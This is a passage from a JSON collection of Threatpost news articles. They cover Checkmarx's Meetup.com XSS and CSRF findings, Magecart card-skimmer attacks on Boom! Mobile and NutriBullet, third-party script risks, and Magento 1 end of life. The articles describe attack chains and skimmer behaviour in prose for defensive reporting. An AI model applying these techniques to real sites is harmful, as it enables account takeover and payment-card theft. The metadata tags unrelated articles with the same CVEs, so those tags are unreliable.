forgery](<https://threatpost.com/ebay-vulnerable-to-account-hijacking-via-xsrf/103311/>) \u2013 both tied to the platform\u2019s application programming interface (API).\n\nBelow is an interview with Yalon conducted ahead of the research along with an accompanying transcript.\n\n[** Listen to the full interview below or at this link.**](<https://www.youtube.com/watch?v=M85zrOA59OE>)\n\n_Below find a lightly edited transcript of the interview._\n\n**Lindsey O\u2019Donnell Welch**: This is Lindsey O\u2019Donnell Welch with Threatpost and I am joined today by Erez Yalon, the director of security research with Checkmarx. And [we\u2019re talking during Black Hat USA 2020,](<https://threatpost.com/category/bh/>) where Checkmarx is announcing some new security research that they came out with. So Erez thank you so much for joining me today. It\u2019s nice to be talking to you even though this year, it\u2019s actually virtually instead of our in person interviews [that we\u2019ve done in the past.](<https://threatpost.com/black-hat-2019-news-wrap-best-worst/147223/>)\n\n**Erez Yalon**: Yeah, we usually do face to face but this is not allowed in the new normal. So this is how we do it now. But it\u2019s fine.\n\n**LO:** There\u2019s always Black Hat 2021. Now, during Black Hat 2020 Checkmarx\u2019s security research team has some new research that you are releasing, and that is specifically focused around Meetup.com. And for those who don\u2019t know, Meetup.com is a popular website that allows users to create an event for people, with similar interests to gather, so you know, book clubs or dog walking clubs, for instance. So Erez you found an array of kind of security issues in the investigations that you did \u2013 everything from API security issues to cross-site scripting and cross site request forgery flaws, can you kind of give us a rundown of the research and you know, what these different vulnerabilities were?\n\n**EY: **Sure. Okay, so basically looking at Meetup.com, we\u2019re not targeting specifically them. We\u2019re in general, looking at the websites that are high in demand and more interesting for everyone, for consumers and us as well. So Meetup was one in a long list. Now, it was part of our research about API security, which we invest a lot in these days. But actually the biggest issues we found were just good old application security issues.\n\nI think that they are probably among the top five famous vulnerabilities that can be found in appsec, application security. One of them is the [cross site scripting flaw](<https://threatpost.com/wordpress-xss-drive-by-code-execution/148324/>). And the other one is the [cross site request forgery](<https://threatpost.com/ebay-vulnerable-to-account-hijacking-via-xsrf/103311/>), also known as XSS and CSRF.\n\nWhen we started playing with Meetup, we found that one of their features or endpoints is not totally sanitizing \u2013 and by sanitizing I mean, removing bad inputs \u2013 not totally sanitizing the fields that are in the discussion field. Now, every Meetup group has a discussion board under the group. And it\u2019s, as far as I know, enabled by default. We didn\u2019t see any groups without it, I think it makes sense to allow discussions in the group.\n\nAnd the sanitization process there was not complete. And we managed to bypass it by adding some specific scripts and tags that bypassed the protection of the Meetup website. What it was is what we call stored XSS. Now, instead of a message or a discussion or a post on the page, we could have put some benign message actually in the background on a script. So this by itself is very bad already, because it means that in the context of a web browser, we can do whatever we want, now for every person who visits this discussion board, so it can be stealing information that is part of your web browsing process like cookies and sessions, and things like that. We can deface the website or even do some cryptomining on the web browser. So this, this actually lets us do many, many things. The interesting part was that we thought, okay, if it\u2019s a stored XSS, it means that that the organizers will probably fall into this hole as well as the XSS. So they might run some sort of script on their side, and we know that they have admin capabilities. So the next vulnerability we found was cross-site request forgery, CSRF, which means that essentially when the user is authenticated on the server, it means that if I have hold of the client side, which I do with XSS, I can run a lot of commands in the name of that user, and the user will not even be able to tell that the web browser actually sent these commands.\n\nSo just before I talk about specifically what we did here, I want to mention that the combination of XSS and CSRF is the holy grail for us, because when you manage to chain these two together, sometimes there are no limits to what can actually happen. So riding on the XSS will propel specific, malicious script that runs on the organizers\u2019 side, on the organizers\u2019 browser. And then by abusing the CSRF we\u2019ve caused the organizer to give permissions of a co-organizer to the attacker. So suddenly, we\u2019ve taken over the account completely and we have access to a lot of information \u2013 we can change the Meetup, we can cancel it, we can create a fake meetup, etc. So this actually was some sort of privilege escalation we created. And because we\u2019ll never be happy and we always want more. To top it all, we found a way also to, to play a bit with the payment details. So with Meetup you have a lot of options of collecting payments, sometimes it\u2019s just $1 or two for refreshments from each one and sometimes it\u2019s a paid session like $100 or $200. And we were able to \u2013 like we did with the privilege escalation I described we could actually redirect the payment to our own PayPal address. So our scene, when we imagined it, is an attacker changing all the payments of Meetup for like 24 hours, gathering all the all the money and running away. This is the scenario we imagined. And I think it was interesting \u2013 we did not try that \u2013 but as a as a theory, we could actually create a wall that would infect each user and each user would infect all the Meetup groups they are part of, etc., going on and on like that. This way we could have also reached private groups and groups that are not listed on Meetup. So all in all, it\u2019s kind of a critical issue, as you can understand.\n\n**LO:** For sure, I mean, that impact there of being able to redirect all payments to a PayPal account seems like it would definitely be a lucrative one for cyber criminals who are definitely motivated by money. So that could be a serious impact there. In terms of exploitability for these vulnerabilities. How serious are they? What would an attacker potentially need to, you know, carry out an actual attack here?\n\n**EY:** So the field that was not sanitized well, it was partially sanitized. So I believe that automatic hacking tools or testing tools that check for this would not find it, but we tend to be creative. So when we find something that seems not completely protected, we will find a crack together, so it was more of a manual thing than an automatic thing. But I think that every hacker that would have decided to do that would eventually probably find a way in. And as soon as you find the XSS, and then the next thing you do is to look for the CSRF, because as I said, they go together to reach the higher purpose of really doing some damage there.\n\n**LO:** Yeah. And what was the process of disclosure here? Because you guys reach out to meet up and I believe they have fixed everything. Is that correct?\n\n**EY:** Yeah, we never publish anything without getting confirmation from the vendor that they fixed everything. And the reason is that we don\u2019t want to put the users in any unnecessary risk obviously. So we reached out to Meetup. They fixed things, they talked to us, we helped them through the fix cycle. Trying to direct them to the right way to do that. And just recently, they got back to us and informed us that everything they meant to fix is fixed. And that\u2019s it. So now we\u2019re free to discuss that.\n\n**LO:** Great well, definitely some interesting research there. And now we have Black Hat this week, and what are some of kind of the top threats you expect to be discussed at the conference this year? And, I mean, they might be related to [COVID and the ongoing pandemic](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>) or [election security](<https://threatpost.com/election-security-threats-from-misinformation-to-voting-machine-flaws/147164/>). I mean, those are kind of the top ones I\u2019m expecting to see, but is there anything from your standpoint, having been observing what\u2019s been going on in the threat landscape over the past few months that you\u2019re really expecting to hear more about?\n\n**EY**: Yeah, so I think the trends would definitely dictate election security. And maybe also COVID, I\u2019m not sure it\u2019s been enough time to actually create some sort of presentation that will tell us a lot about that. I think it will be interesting to wait a bit into the future and see what happened. Although I\u2019m sure there are some people who can already discuss that. Another trend we can [probably expect to see is 5G](<https://threatpost.com/5g-and-iot-how-to-approach-the-security-implications/148681/>), all the talks around that, some of them targeting the actual technology, some of them the hype and the scared people around it. Regarding more technical aspects, I think that we saw a big trend of [moving towards API security](<https://threatpost.com/akamai-on-credential-stuffing-attacks/153654/>) in the past, we will probably see the bigger picture now. Everything that is what we call cloud-native, from containers to serverless to again, API security. And everything that is about this new architecture that is no longer a buzzword, it\u2019s actually what we see every day. And this is where modern architectural software is going. Obviously, it has a lot of pluses and a lot of things that makes everything simpler to us. But security sometimes as we know, drags behind. So this is a good time to close the gap and make sure that security is also moving forward in the same piece of architecture and our cutting edge technology.\n\n**LO:** And to your point about 5G I certainly think that\u2019ll be a big topic as well, just with everything, starting to be rolled out and a lot of hype there over the past year or so. And I also wanted to ask you, I mean, you know, you\u2019ve been up in charge of the AppSec village in previous Black Hats. What can we expect there for this year, especially with everything being virtual?\n\n**EY: **Yeah, so AppSec village is part of DEF CON not Black Hat. And we started it last year. It was the first year it was great success we had during DEF CON, which is directly after Black Hat, almost 5,000 visitors in our AppSec village, which is like a mini conference inside of a conference, which is talking mainly about application security, obviously. This year DEF CON moved to or what they call safe mode, which is simply going virtual and we pivoted towards that as well. We\u2019re not sure in the beginning because none of us had the experience of creating and virtual conference before. But we heard the community and everyone demanded to have another AppSec village this year. So we decided we were going to do that, together with my colleagues, friends and co leaders. We managed to get a group of volunteers and got a lot of support from DEF CON themselves. And it\u2019s going to be virtual everything is going to be through Discord with some recorded talk, some live talks, we\u2019re going to actually try to do workshops, virtually, it\u2019s going to be kind of challenging, but I think that people who are coming to DEF CON, are really anxious and really want to get their hands dirty, in a way. And we\u2019re going to have a nice competition of the Capture the Flag around the application security teams, and we\u2019re going to meet a lot of people it\u2019s going to be very, very interesting trying to make this new normal, somehow normal.\n\n**LO:** Right, yeah, well, I you know, I\u2019m excited to see how that plays out. And I\u2019m sure that the interest is definitely there and there will be a lot of cool things coming out of that, so, Erez, thank you so much for coming on to talk a little bit more about your new research and what to expect over the next week.\n\n**EY:** My pleasure.\n\n**LO:** Great, and to all of our listeners. Thanks for listening in. If you liked what you heard or had any thoughts or questions, please comment below the video and be sure to subscribe. Thank you.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n\nWrite a comment\n\n**Share this article:**\n\n * [Newsmaker Interviews](<https://threatpost.com/category/newsmaker-interviews/>)\n * [Videos](<https://threatpost.com/category/videos/>)\n", "cvss3": {}, "published": "2020-08-03T15:13:40", "type": "threatpost", "title": "Black Hat USA 2020: Critical Meetup.com Flaws Reveal Common AppSec Holes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-03T15:13:40", "id": "THREATPOST:ED2B1571104341CFA35DF2C4172EB792", "href": "https://threatpost.com/black-hat-usa-2020-critical-meetup-com-flaws-reveal-common-appsec-holes/157950/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:07:55", "description": "Boom! Mobile\u2019s U.S. website recently fell victim to an e-commerce attack, putting online shoppers in danger of payment-card theft, researchers said.\n\nBoom! is a wireless provider that resells mobile phone plans from Verizon, AT&amp;T and T-Mobile USA, under its own brand and with its own perks (the company boasts \u201cgreat customer service\u201d and no contracts). Up until yesterday, the provider\u2019s main website was hosting malicious code, which lurked on the online checkout page and harvested online shoppers\u2019 details.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nThe approach is reminiscent of core Magecart group attacks, but in this case, the attack was the work of the Fullz House group, according to Malwarebytes, which is a Magecart splinter group that\u2019s mainly known for its phishing prowess.\n\n\u201cMost victims of Magecart-based attacks tend to be typical online shops selling various goods. However, every now and again we come across different types of businesses which were affected simply because they happened to be vulnerable,\u201d Malwarebytes researchers said in a [Monday post](<https://blog.malwarebytes.com/malwarebytes-news/2020/10/mobile-network-operator-falls-into-the-hands-of-fullz-house-criminal-group/>).\n\nAccording to [a review](<https://sitecheck.sucuri.net/results/boom.us>) from Sucuri, boom[.]us was running PHP version 5.6.40, which reached end-of-life in January 2019. As of this writing, the website still has outdated status.\n\n\u201cThis may have been a point of entry but any other vulnerable plugin could also have been abused by attackers to inject malicious code into the website,\u201d researchers pointed out.\n\n## **The Attack**\n\nThe cybercriminals managed to inject malicious code into Boom!\u2019s web platform, researchers explained.\n\n\u201cOur crawlers recently detected that their website, boom[.]us, had been injected with a one-liner that contains a Base64 encoded URL loading an external JavaScript library,\u201d researchers wrote. \u201cOnce decoded, the URL loads a fake Google Analytics script from paypal-debit[.]com/cdn/ga.js. We quickly recognize this code as a credit-card skimmer that checks for input fields and then exfiltrates the data to the criminals.\u201d\n\nThe skimmer is highly detectable, because it exfiltrates data every time it detects a change in the fields displayed on the page \u2013 i.e., whenever someone types something in. As a result, it lacks stealth: \u201cFrom a network traffic point of view, you can see each leak as a single GET request where the data is Base64 encoded,\u201d explained the researchers.\n\nIn this case, both the exfiltration domain (hosted on Alibaba) and the injected code proved to be familiar; they have turned up in previous Fullz House incidents, including one where the threat actors were using decoy payment portals set up like phishing pages.\n\n## **Fullz House Back on the Schedule**\n\nThe group [has been analyzed](<https://threatpost.com/magecart-variant-tactics-mitm-phishing/150628/>) in the past, and gets its name from the use of carding sites to resell \u201cfullz,\u201d an underground slang term meaning a full set of an individual\u2019s personally identifying information plus financial data.\n\nFullz House was discovered ramping up activity starting in August-September of 2019. It uses a unique codebase and different tactics from the main Magecart variants to carry out its attacks, according to researchers.\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who all use the same modus operandi: They compromise websites (mainly built on the Magento e-commerce platform) in order to inject card-skimming scripts on checkout pages, stealing unsuspecting customers\u2019 payment card details and other information entered into the fields on the page.\n\nAccording to a previous analysis from RiskIQ, Fullz House is known for innovating when it comes to the Magecart blueprint by adding phishing to the mix. It uses generic phishing to gather and sell personal information, for which they have a dedicated store called \u201cBlueMagicStore.\u201d In the web-skimming arena, the group is harvesting financial data during e-commerce checkouts, and selling credit-card information on its carding store, which is named \u201cCardHouse.\u201d\n\nBoom! is certainly not the group\u2019s only target: \u201cIn late September, we noticed a number of new domains that were registered and following the same pattern we had seen before with this group,\u201d researchers wrote. \u201cHowever, this group was quite active in the summer and continues on a well-established pattern seen a year ago.\u201d\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-06T17:39:35", "type": "threatpost", "title": "Boom! Mobile Customer Data Lost to Fullz House/Magecart Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-10-06T17:39:35", "id": "THREATPOST:0AF6471C8950B312AA2DB603A5C2F82F", "href": "https://threatpost.com/boom-mobile-customer-data-fullz-house-magecart/159887/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:50", "description": "A faction under the Magecart umbrella, Magecart Group 8, targeted the website of the blender manufacturer, NutriBullet, in an attempt to steal the payment-card data of its online customers.\n\nYonathan Klijnsma, threat researcher with RiskIQ, said [in a Wednesday post](<https://www.riskiq.com/blog/labs/magecart-nutribullet/>) that a JavaScript web skimmer code was first inserted on the website of the blender retailer (nutribullet.com) on Feb. 20, specifically targeting the website\u2019s checkout page, where customers input their payment information. As of Tuesday, NutriBullet said that they have removed the malicious code.\n\n\u201cNutriBullet takes cybersecurity and personal privacy extremely seriously and is dedicated to the protection of our customers,\u201d NutriBullet said in a statement to Threatpost. \u201cOur IT team immediately sprang into action [March 17] upon first learning from RiskIQ about a possible breach. The company\u2019s IT team promptly identified malicious code and removed it. We have launched forensic investigations to determine how the code was compromised and have updated our security policies and credentials to include Multi-Factor Authentication as a further precaution. Our team will work closely with outside cyber security specialists to prevent further incursions. We thank RiskIQ for bringing this issue to our attention.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nHackers inject web skimmers into targeted websites and designed to steal data entered into online payment forms on e-commerce websites. When a visitor goes to that website, these skimmers (such as the popular [Pipka](<https://threatpost.com/pipka-card-skimmer-removes-itself-after-infecting-ecommerce-sites/150341/>) or [Inter)](<https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html>) will then scoop up personal details entered on the site.\n\n**The Skimmers**\n\nThe web skimmer that researchers first discovered on NutriBullet\u2019s site first uses a page check (via a simple regex, which is a sequence of characters to define a search pattern) to investigate whether the current browser page looks like a payment page. Once the variables are verified and the page correctly defined as a payment page, the code will call the skimming function. This skimming functionality will grab victims\u2019 payment information as they enter it into the payment field on the website, and then exfiltrate it to attacker controlled servers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/17122712/magecart-skimmer.png>)\n\nAfter multiple attempts to contact NutriBullet and receiving no response, RiskIQ decided to initiate the takedown of the attacker exfiltration domain with the help of Swiss security site AbuseCH, and the Shadowserver Foundation, a nonprofit security organization that focuses on malicious internet activity (NutriBullet, for their part, said they had not heard from researchers until March 17).\n\n\u201cGroup 8 operators were using this domain to receive stolen credit-card information, and its takedown prevented there being new victims,\u201d said researchers.\n\nDespite taking down the attacker exfiltration domain, researchers said that they observed the skimmer being removed on March 1, only to be replaced with a new skimmer (and a new exfiltration URL) on the website on March 5. Researchers said they believe that the attackers may have removed the skimmer and set up a new domain after the initial domain was blocked. Researchers again worked with AbuseCH and ShadowServer to take down the new domain; but then, they found another skimmer on the NutriBullet website yet again on March 10. This latest skimmer however had the same, now-defunct domain as the previous one.\n\n\u201cAt the time the attackers placed the skimmer in this new script, we had already taken down the domain they used for receiving data,\u201d said researchers. \u201cWe believe the attackers saw that traffic dropped and assumed NutriBullet had cleaned up its site. They then moved the skimmer elsewhere without realizing the domain was defunct.\u201d\n\n**Magecart Threat**\n\nResearchers said they are familiar with the specific skimmer code used in this incident, as it has been used at least since 2018 by Group 8 \u2013 the Magecart group responsible for previous attacks on bedding and pillow manufacturers [Amerisleep and MyPillow](<https://threatpost.com/magecart-mypillow-emerisleep-attack/143022/>), as well as Philippine broadcast company ABS-CBN. Group 8 is one of many factions under the [Magecart](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>) umbrella, which has made headlines over the past year or so for high-profile breaches of companies like [VisionDirect](<https://threatpost.com/visiondirect-blindsided-by-magecart-in-data-breach/139223/>), [Ticketmaster](<https://threatpost.com/ticketmaster-breach-just-one-part-of-a-wide-ranging-campaign/133892/>) and more.\n\nThis group is unique in that it focuses on individual victims, rather than taking the \u201cshotgun approach\u201d of other Magecart groups that compromises many websites at once. This has proved to be a lucrative technique for the group: For instance, in 2019, Group 8 targeted an unnamed national diamond exchange, allowing them to hit all the exchange\u2019s localized websites at the same time, said researchers.\n\n\u201cHighly targeted, highly technical breaches may become a trend,\u201d said researchers. \u201cAs we saw in the attacks on NutriBullet and other victims, there are a variety of ways to attack the functionality of a website. Operatives with the right acumen and enough time will find them.\u201d\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-18T09:00:27", "type": "threatpost", "title": "Magecart Cyberattack Targets NutriBullet Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-18T09:00:27", "id": "THREATPOST:07CDA6601F0919DC6946C150BBBE8900", "href": "https://threatpost.com/magecart-cyberattack-targets-nutribullet-website/153855/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:29:12", "description": "When we think of \u201csecuring our website\u201d from attackers, we often think of securing against hooded figures somewhere in Eastern Europe working out of a smoky office above an illegal gambling den. Not only is that probably geographically insensitive, it\u2019s also not necessarily the best way threat to get your attention for the risk column in your next CISO briefing.\n\nWell, you might ask, \u201cwhat _should_ I be focusing on?\u201d The answer: There\u2019s a growing number of issues related to third- and fourth-party scripts running on your company website, so this is a good place to start.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/11/14093430/akamai-waterfall.jpg>)\n\nWaterfall chart example \u2014 click to enlarge.\n\nConsider a classic webpage waterfall chart: This is a chart that shows you what elements of your web page are loading, and how long each of those elements is taking to load. This can help you with answering some page-optimization questions like, which of these elements can be reordered or possibly combined; or which of these particular artifacts are mandatory and which ones can be removed. \nThis is the area of interest that most security teams are not looking into. And I\u2019m not talking about page-load times \u2014 I\u2019m talking about all of those \u201celements\u201d that are loading each time a user visits your website.\n\nWhat could we expect to see there besides visible webpage elements? Well, we might see some JavaScript placed there for advertising tech purposes, marketing automation or possibly user personalization reasons. Let\u2019s not forget the trusty analytics packages that pretty much everyone in the world has loading on their pages. Not only are these resources there to help your webpages perform better, give you information you need about your visitors and provide other sorts of optimization for your site, they\u2019re also a majorly underappreciated source of malicious potential for an attacker.\n\nLet\u2019s look at what happens when these resources and their perceived trust are abused by attackers. In 2013, a group known as the [Syrian Electronic Army](<https://threatpost.com/syrian-electronic-army-hacks-cnn-social-media-microsoft-transparency-data/103869/>) (SEA) compromised a marketing and recommendation partner for three of the major news outlets in the United States. Because the scripts [](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/11/14094033/Akamai-SEA.jpg>)that were sent to these three news outlets were \u201ctrusted\u201d as part of their marketing agreement, they were promptly loaded into every page load for every user that came to visit the sites that day. And when any user clicked on a recommended news article, they were automatically taken to the website for the SEA.\n\nThe above \u201chack\u201d seems like a cool way to get people to come to your website, but what else could be pulled off using similar techniques \u2014 perhaps something more malicious? And is this still a possibility today?\n\nYes, and yes! Last year, a similarly exploited vulnerability wreaked havoc on several online retailers by a collective of at least six attacker groups who have come to be [known as Magecart](<https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/>). Uncovered by researchers at RiskIQ and Flashpoint, these groups were able to take more than just the joy out of the holiday season by using [formjacking](<https://www.experian.com/blogs/ask-experian/what-is-formjacking/>) and X-Frame options to perform [clickjacking](<https://www.owasp.org/index.php/Clickjacking>) through malicious injected JavaScript code into third-party web elements.\n\nThe attackers, using what are still not totally known methods, were able to inject malicious JavaScript into the online retailers\u2019 shopping cart applications, allowing them to perform card-skimming operations, which in some cases led to the full data breach of associated customer records. [British Airways](<https://threatpost.com/british-airways-e-ticketing-flaw-exposes-passenger-flight-personal-data/147260/>) in the UK, for instance, lost over 300,000 customer records as part of its Magecart breach.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/11/14094856/Akamai-code-injection.jpg>)\n\nThere have been some solid recommendations made on how to combat this problem, such as using security response headers. These can be used to communicate security policy settings for any web browser that is interacting with your website.\n\nUnfortunately, most organizations aren\u2019t making significant use of these headers, as they either believe that web application firewall security protections can thwart these types of attacks (which they cannot, because the client side is what\u2019s running the malicious JavaScript). Maybe it\u2019s too cumbersome to consider, since the list of headers isn\u2019t static, and continually changes over time \u2013 so organizations are unwilling to manage that process. Another possibility is simple ignorance with regard to the depth of the issue.\n\nThere are also a few sites that can scan your organizations website for free and give you a simple scorecard to get you started on your journey to correcting the script problem. A few of them are:\n\n * <https://securityheaders.com/>\n * <https://observatory.mozilla.org/>\n * <https://www.hardenize.com/>\n\nSince this problem is not the full responsibility of a website owner themselves, but instead stems from the relationship to potentially exploited partner JavaScript code, this should be considered a supply-chain attack. But how does one ensure that all third- and fourth-party code is secure before you allow it to run against your clients?\n\nAn emerging possibility is your own injection of client-side JavaScript into a users\u2019 browser \u2013 to be used for good.\n\nThis type of capability is categorized as Runtime Web Application Self-Protection (RWASP), and if implemented correctly, it can bridge the gap between the endless variability of partner-side code scanning. It gives the browser itself the ability to make runtime decisions about what it\u2019s actually seeing load during that full-page waterfall we looked at before, via a good JavaScript that can detect unwanted or malicious script functionality.\n\nAdditionally, the implementation of this new validation and monitoring check can be done in an ongoing manner.\n\nWe\u2019re approaching the biggest time of the year for e-commerce activity \u2013 and for malicious card-skimming attacks as a result. By implementing some of these ideas, you can help make sure that this holiday season, your company may only be in the headlines for the right reasons.\n\n**_Tony Lauro is director of security strategy at Akamai._**\n\n**_Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by [visiting our microsite.](<https://threatpost.com/microsite/infosec-insiders-community/>)_**\n", "cvss3": {}, "published": "2019-11-14T15:18:49", "type": "threatpost", "title": "Website, Know Thyself: What Code Are You Serving?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-14T15:18:49", "id": "THREATPOST:91752358A60874F9C9D448BB279A8192", "href": "https://threatpost.com/website-know-thyself-what-code-are-you-serving/150257/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:37", "description": "With Magento 1 reaching end-of-life (EOL) on Tuesday, Adobe is making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2.\n\nMagento is a popular, Adobe-owned open-source e-commerce platform that powers many online shops. After June 30 (Tuesday of this week), Adobe is pulling the plug on security fixes for Magento Commerce 1.14 and Magento Open Source 1 (formerly known as Enterprise Edition and Community Edition, respectively). E-commerce merchants must [migrate to Magento 2](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>), which was released five years ago.\n\n\u201cThousands of merchants have already migrated to Magento 2,\u201d according to a recent [Magento update](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>). \u201cIt is the best solution for growing businesses to succeed and thrive in digital commerce. Magento 2 offers a wealth of built-in features that are not available in Magento 1, plus infrastructure that is easier to maintain and support.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWith the number of active users of Magento 1 [still topping 100,000](<https://sansec.io/magento-usage-data>), the looming EOL date opens up various cybersecurity issues. The [Magecart cybergang](<https://threatpost.com/magecart-blue-bear-attack/151585/>), which has [previously targeted](<https://threatpost.com/critical-flaws-magento-ecommerce-code-execution/152343/>) the platform in order to inject card-skimming scripts onto checkout pages, is the biggest concern for security researchers. And security holes continue to pop up in the platform \u2013 [Just last week](<https://helpx.adobe.com/security/products/magento/apsb20-41.html>) Adobe issued fixes for critical- and important-severity flaws in Magento 1.14.4.5 and earlier versions, warning that the security update was the final one for Magento 1.\n\nAs of Tuesday, e-commerce sites using the outdated Magento version will also be out of compliance with [the PCI DSS standard](<https://www.pcisecuritystandards.org/document_library>) (the Payment Card Industry Data Security Standard), which is a security standard for organizations handling credit cards, which aims to help reduce credit card fraud. [Requirement 6](<https://www.pcisecuritystandards.org/documents/PCI_DSS-QRG-v3_2_1.pdf?agreement=true&time=1587662200387>) of the PCI DSS requires merchants to \u201cdevelop and maintain secure systems and applications by installing applicable vendor-supplied security patches\u201d which they cannot do when future security patches for Magento 1 are killed.\n\n\u201cOnce a version of Magento Commerce software is no longer supported, it falls out of PCI compliance and it is your responsibility to re-certify compliance,\u201d according to [Adobe](<https://magento.com/sites/default/files8/2019-09/implications-of-unsupported-software-FAQ.pdf>). \u201cMerchants may be subject to fines or removal of credit card processing ability if you are unable to update vulnerabilities from regular scans and penetration testing.\u201d\n\nAdobe isn\u2019t the only company urging websites to update. [PayPal](<https://www.paypal.com/gp/smarthelp/article/magento-1-end-of-life-announcement-ts2249>) and [Visa](<https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/acquirer-advisory-magento-migration.pdf>) have also issued alerts, saying that PCI DSS requirements apply to merchant integrations with card payment brands. And according to a [report by ZDNet](<https://www.zdnet.com/article/adobe-mastercard-visa-warn-online-store-owners-of-magento-1-x-eol/>), Mastercard also recently sent customers security alerts warning them to update to avoid cyberattacks.\n\nMagento 1\u2019s EOL has been a long time coming. [Magento 2 was released](<https://magento.com/blog/best-practices/migrating-magento-2-what-2-know>) in 2015 with various improved features, including better performance and a mobile-friendly admin interface (for reference, the most current version of Magento [is Magento 2.3.5,](<https://magento.com/tech-resources/download>) released in April). The imminent June 2020 EOL for Magento 1 was then announced in September 2018, months after Adobe acquired [Magento in May 2018](<https://news.adobe.com/news/news-details/2018/Adobe-to-Acquire-Magento-Commerce/default.aspx>). Since then, Magento has been working with technology vendors, developers, customers and partners for transition plans to the new version.\n\nEnd of life timelines often leave lagging companies in security hot water. [With Flash Player\u2019s](<https://threatpost.com/adobe-prompts-users-to-uninstall-flash-player-as-eol-date-looms/156794/>) Dec. 31, 2020 kill date quickly approaching, for instance, Adobe said that it will start prompting users to uninstall the software in the coming months.\n\n\u201cAny time software reaches end-of-life there is the risk of attackers discovering new vulnerabilities that will remain unpatched,\u201d Zach Varnell, Senior AppSec Consultant at nVisium, told Threatpost. \u201cThere may even be existing vulnerabilities that are not yet publicly known. Attackers could just sit on those issues and not reveal them until after the EOL date, ensuring that they will have longer to use them.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-29T18:56:11", "type": "threatpost", "title": "Tuesday\u2019s Magento 1 EOL Leaves Clock Ticking on 100K Online Stores", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-29T18:56:11", "id": "THREATPOST:A30E6A4920ABDF2ACEDA56240984C9FD", "href": "https://threatpost.com/tuesdays-magento-1-eol-100k-online-stores/157000/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 